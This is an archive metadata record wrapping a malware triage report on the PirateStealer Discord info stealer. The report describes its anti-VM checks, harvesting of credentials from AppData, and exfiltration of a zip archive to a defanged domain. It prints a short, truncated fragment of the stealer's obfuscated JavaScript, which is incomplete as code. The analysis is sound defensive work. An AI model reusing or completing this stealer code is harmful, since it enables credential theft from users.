{
	"id": "3326307e-c8e1-4d8b-87a0-ae3d47560727",
	"created_at": "2026-04-06T00:22:01.360301Z",
	"updated_at": "2026-04-10T03:20:56.202734Z",
	"deleted_at": null,
	"sha1_hash": "cfa608097bcc7a221f83e5bcf77fdfc1ad1ec173",
	"title": "Malware Analysis and Triage Report : PirateStealer - Discord_beta.exe",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 38535,
	"plain_text": "Malware Analysis and Triage Report : PirateStealer -\r\nDiscord_beta.exe\r\nBy Mayank Malik\r\nPublished: 2022-12-01 · Archived: 2026-04-02 12:45:04 UTC\r\nPirateStealer is a new Info Stealer in the scene. Not much info is provided about this family and the sample is\r\nrelatively new. No traces has been found on either Malware Bazaar or Malpedia. The sample will be submitted to\r\naforementioned databases after this post.\r\nThe sample executes itself and checks for presence of Virtualized Environment by using registry information and\r\ndisk drive identifiers. It throws an error and exists itself after failing the virtualization check. If the check\r\nsucceeds, it scours through the directory C:\\User\\\u003cusername\u003e\\AppData\\Local\\* to harvest credentials, create an\r\narchive save.zip and exfiltrate it over HTTPS to an endpoint on 4wz[.]us\r\nlet\r\nvar _0x4e36eb = _0x534c;\r\nfunction _0x534c(_0x534ce2, _0x16ca1e) {\r\n var _0x53c7eb = _0x519e();\r\n return _0x534c = function (_0x8a4667, _0x43ddf0) {\r\n _0x8a4667 = _0x8a4667 - (0x1d98 + -0x1329 + 0x1d2 * -0x5);\r\n var _0x1cdf74 = _0x53c7eb[_0x8a4667];\r\n return _0x1cdf74;\r\n }, _0x534c(_0x534ce2, _0x16ca1e);\r\n}\r\nfunction _0x519e() {\r\n var _0x2b3aad = ['np?(gg=win', 'PBOWW', 'querystrin', 'https:/', 'Added', '3308240uRVMVW', 'atus.disco', 'AP\r\n _0x519e = function () {\r\n return _0x2b3aad;\r\n };\r\n return _0x519e();\r\n}(function (_0x3f6ee4, _0x2fc5be) {\r\n var _0x346931 = _0x534c,\r\n _0x41454c = _0x3f6ee4();\r\nSource: https://mostwanted002.page/post/malware-analysis-and-triage-report-piratestealer\r\nhttps://mostwanted002.page/post/malware-analysis-and-triage-report-piratestealer\r\nPage 1 of 1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://mostwanted002.page/post/malware-analysis-and-triage-report-piratestealer"
	],
	"report_names": [
		"malware-analysis-and-triage-report-piratestealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434921,
	"ts_updated_at": 1775791256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cfa608097bcc7a221f83e5bcf77fdfc1ad1ec173.pdf",
		"text": "https://archive.orkl.eu/cfa608097bcc7a221f83e5bcf77fdfc1ad1ec173.txt",
		"img": "https://archive.orkl.eu/cfa608097bcc7a221f83e5bcf77fdfc1ad1ec173.jpg"
	}
}